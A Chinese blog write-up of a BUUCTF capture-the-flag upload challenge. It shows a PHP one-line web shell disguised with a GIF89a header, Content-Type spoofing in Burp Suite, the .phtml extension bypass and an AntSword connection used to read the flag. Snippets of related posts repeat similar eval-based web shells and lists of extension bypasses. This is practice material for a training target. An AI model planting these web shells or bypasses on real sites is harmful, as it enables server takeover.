BUUCTF刷题记录 Upload

最新推荐文章于 2024-03-31 16:27:23 发布
最新推荐文章于 2024-03-31 16:27:23 发布
阅读量467 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46576074/article/details/106208436
版权

[极客大挑战 2019]Upload

进入页面
在这里插入图片描述选择phtml的文件上传 上传木马 木马内容为

GIF89a
<script language="php">eval($_POST['flag']);</script>

在上传文件的时候用burp suite抓包
在这里插入图片描述

因为只允许图片上传 所以

Content-Type: image/jpeg

然后放行
在这里插入图片描述

然后蚁剑连接
地址

http://11990597-cb68-43a4-b37b-0afc623745e9.node3.buuoj.cn/upload/mm.phtml

密码(木马里面自己编写的)

flag

在这里插入图片描述

右击 点击虚拟终端
在这里插入图片描述
命令 cat /flag 得flag
在这里插入图片描述

m0_46576074
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF upload-labs
oJiuJieZhong的博客
10-11 3264
①这里是前端JS限制了我们只能上传特点格式的文件 ②这里我们可以在设置里面直接关闭网页的JS ③或者通过抓包的形式,绕过前端验证 ④这里在burp suite中将jpg改成php ⑤这里上传成功 ⑥我们也可以通过抓包的形式来了解文件上传的位置 ...
BUUCTF-Web-[ACTF2020新生赛]Upload
m0_61851859的博客
03-27 417
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
buuctf-upload
m0_62094846的博客
10-31 759
按照指示上传文件 用burp抓取 直接看到flag,我以为就这么做完了,但是交不上去,再看页面,Look here,可能还是需要木马, 但用上次的方法,改文件格式为php,就不会显示上传成功了 查找发现,也可以上传,phtml文件名 就可以得到成功的返还了 接下来按照原来的方法做,用蚁剑,最后可以在根目录下得到flag ...
BUUCTF-Web[ACTF2020 新生赛]Upload
rumil的博客
06-24 2274
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传
BUUCTF [ACTF2020 新生赛] Upload
Senimo
01-09 759
BUUCTF [ACTF2020 新生赛] Upload 考点: .phtml文件上传 前后端限制绕过 启动环境: 一个灯泡图标,点击的话会出现文件上传点: 随便上传点东西试试: 得到提示: 查看网页源码: <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()"> 表单提交后会执行checkFile()函数,在main.js中查看该函数: function checkFile()
BUUCTFUpload [ACTF2020 新生赛]
金 帛的博客
04-19 743
BUUCTF的WP
BUUCTF-Web:[ACTF2020 新生赛]Upload
m0_56161093的博客
05-30 1121
题目 解题过程 1、上传文件 从网页上来看,可以上传文件,我们尝试上传一个PHP一句话木马。结果如下: 提示我们只能上传图片类型的文件,尝试用burpsuite抓包,发现同样有弹窗,但没有抓到数据。所以这里猜测这里是前端JS进行校验的 2、绕过前端校验 方法一 禁用一下 js 再提交,就可以绕过了 方法二 修改PHP后缀为图片的后缀然后上传,再重新抓包修改后缀 修改前: 修改后: 上传结果如下: 可以看到上传失败,应该是服务器端对上传的文件进行了校验。 3、绕过上传黑名单 常规PHP文件后缀
buuctf upload
10-20
根据提供的引用内容,buuctf upload 是一个文件上传功能。通过上传文件的路径,可以成功访问上传的文件。同时,引用中还提到了一些绕过后端内容检查的方法,例如拼接文件的方式和修改文件后缀名的方式。这些方法可以...
buuctfUpload-Labs-Linux
07-16
buuctf upload-labs-linux 是一个基于 Linux 平台的上传漏洞实验室,旨在帮助安全从业人员学习上传漏洞的原理和利用方法。该实验室提供了多个不同难度级别的漏洞场景,用户可以通过上传恶意文件、绕过文件类型限制、...
BUUCTF WEB Upload
qq_41696858的博客
08-30 335
这题和昨天的Upload1简直一模一样,甚至还简单点? 可以看看这一篇https://blog.csdn.net/qq_41696858/article/details/119986051?spm=1001.2014.3001.5501 同样的phtml过后缀过滤,同样的png过前端过滤,同样的蚁剑链接,唯一的区别是<?和图片格式过滤没做 参考视频链接:https://www.bilibili.com/video/BV1kq4y1K7wS ...
BUUCTF Web upload
H18779083518的博客
05-10 381
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
Buuctf 极客大挑战 upload
Dexret的博客
12-07 2565
打开该靶机,为一个上传图片的网站 尝试了一下上传php文件改Content-Type,.htaccess以及ini文件,都不能成功 百度了一下还有一种文件名后缀可以绕过 .phtml文件告诉网络服务器,这些文件是由服务器生成的带有动态内容的html文件,就像浏览器中的.php文件表现一样。 因此,在高效使用中,您应该体验到.phtml与.php文件没有任何区别。 这是一个文件ext,一些人用了一段时间来表示它是PHP生成的HTML。 修改shell.php为shell.phtml,内容为:
BUUCTF:[ACTF2020 新生赛]Upload
最新发布
m0_62995661的博客
03-31 449
[ACTF2020 新生赛]Upload题解
buuctf 极客大挑战 upload
SopRomeo的博客
01-29 3454
最近接触了文件上传漏洞,刚好可以做这个题目了 普及下文件上传的漏洞: 根据一些bug可以把我们的木马文件上传进去从而达到控制服务器的目的 分享一下两位大哥文件上传漏洞的技巧以及讲解 文件上传的常见技巧 文件上传漏洞的普通技巧与讲解 这道题百度了好久,才做出来 当个web狗真的难受 这道题考到了文件头绕过以及js代码绕过 先看看是不是黑名单 发现phtml可行 这边我在burpsuit试了很久才试...
BUUCTFUpload [极客大挑战 2019]
金 帛的博客
04-19 1273
BUUCTF的WP
BUUCTF [极客大挑战 2019]Upload
m0_49025459的博客
05-12 5076
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
buuctf-web-[ACTF2020 新生赛]Upload
weixin_46079186的博客
07-02 215
打开题目,是一个文件上传 我们上传一个png 图片马,抓包 修改后缀:php,php3,php4,php5,phtml,pht 修改后缀,修改成phtml 后缀名的时候,上传成功 进入 连接 拿到flag
Buuctf<极客大挑战2019>upload
m0_64444909的博客
04-07 5237
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
BUUCTF-WEB-Upload[详细wp]
sGanYu
09-19 2569
关于文件上传的题目 首先上传一句话.php文件,结果显示not image <?php @eval($_REQUEST['password']);?> 猜测当我们上传文件的时候,被标识的文件类型被过滤,即尝试MiMe绕过 MiMe是什么:MIME由一串简单的字符串组成,初期标识了邮件e-mail的附件的类型,后来在html文件中可以使用content-type属性表示,描述了这个文件类型的。 MiMe常见的格式 AUDIO/WAV WAVE音频流媒体文件 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值